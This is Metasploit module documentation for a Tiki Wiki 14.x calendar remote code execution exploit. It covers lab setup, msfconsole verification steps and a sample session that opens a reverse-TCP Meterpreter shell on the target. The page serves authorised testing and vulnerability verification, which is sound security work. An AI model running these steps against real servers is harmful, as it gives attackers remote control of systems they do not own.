## Vulnerable Application

  * Official Source: [sourceforge](https://sourceforge.net/projects/tikiwiki/files/Tiki_14.x_Peony/14.1/)
  * Exploit-db: [edb](https://www.exploit-db.com/apps/2fa84367ba4f14afab9f51cd3e93606d-tiki-14.2.7z)
  * Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)

**Of note, there is some discussion about whether 14.2 is vulnerable or not.**

Arguments that 14.2 is vulnerable:

  1. Exploit-DB says in the title (which may be wrong) that 14.2 is vulnerable.
  2. The application Exploit-DB links to is 14.2.
  3. It's marked as verified on Exploit-DB.

vs.

  1. Manual testing of the PoC with print statements on 14.2 does not appear to show the vulnerability.
  2. The [notice](https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki) seems to say 14.2 is the update that fixes the problem.

### Creating A Testing Environment

  1. Create a fresh Ubuntu 16.04 with a LAMP install
  2. `apt-get install php-xml`
  3. Normal PHP install from that point on
  4. After install, log in as admin:admin
  5. Go to the Control Panels
  6. Click Features
  7. Enable Calendar under Main features
  8. Click Apply

#### Permissions

If you wish to allow the non-logged-in user (anonymous) to view (and thus exploit) the calendar:

  1. Log in as admin
  2. From the top dropdown select Permissions
  3. Check Anonymous near the top
  4. Click Assign

## Verification Steps

  1. Install the software as documented above
  2. Start msfconsole
  3. Do: `use exploit/linux/http/tiki_calendar_exec`
  4. Do: `set rhost 10.10.10.10`
  5. Do: `set PASSWORD admin` (optional; if no password is set, set `username` to an empty string instead)
  6. Do: `set payload php/bind_perl`
  7. Do: `set verbose true`
  8. Do: `check`

    ```
    [*] Attempting Login
    [+] Login Successful!
    [+] 10.10.10.10:80 The target is vulnerable.
    ```

  9. Do: `exploit`
  10. You should get a shell

    ```
    [*] Started reverse TCP handler on 10.10.10.10:4444
    [*] Attempting Login
    [+] Login Successful!
    [*] Sending malicious calendar view packet
    [*] Sending stage (33721 bytes) 10.10.10.10.190
    [*] Meterpreter session 1 opened (10.10.10.10:4444 -> 192.168.2.190:48188) at 2016-06-19 08:50:44 -0400
    ```

## Options

**PASSWORD**

The password is set at first login. The default for admin is 'admin'.

## Scenarios

Example running against an unauthenticated calendar on v14.1:

```
msf > use exploit/linux/http/tiki_calendar_exec
msf exploit(tiki_calendar_exec) > set rhost 192.168.2.190
rhost => 192.168.2.190
msf exploit(tiki_calendar_exec) > set targeturi /t14_1/
targeturi => /t14_1/
msf exploit(tiki_calendar_exec) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(tiki_calendar_exec) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(tiki_calendar_exec) > set verbose true
verbose => true
msf exploit(tiki_calendar_exec) > set username ''
username =>
msf exploit(tiki_calendar_exec) > exploit

[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Sending malicious calendar view packet
[*] Sending stage (33721 bytes) to 192.168.2.190
[*] Meterpreter session 1 opened (192.168.2.229:4444 -> 192.168.2.190:48172) at 2016-06-18 10:58:19 -0400

meterpreter > sysinfo
Computer    : tikiwiki
OS          : Linux tikiwiki 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64
Meterpreter : php/php
meterpreter >
```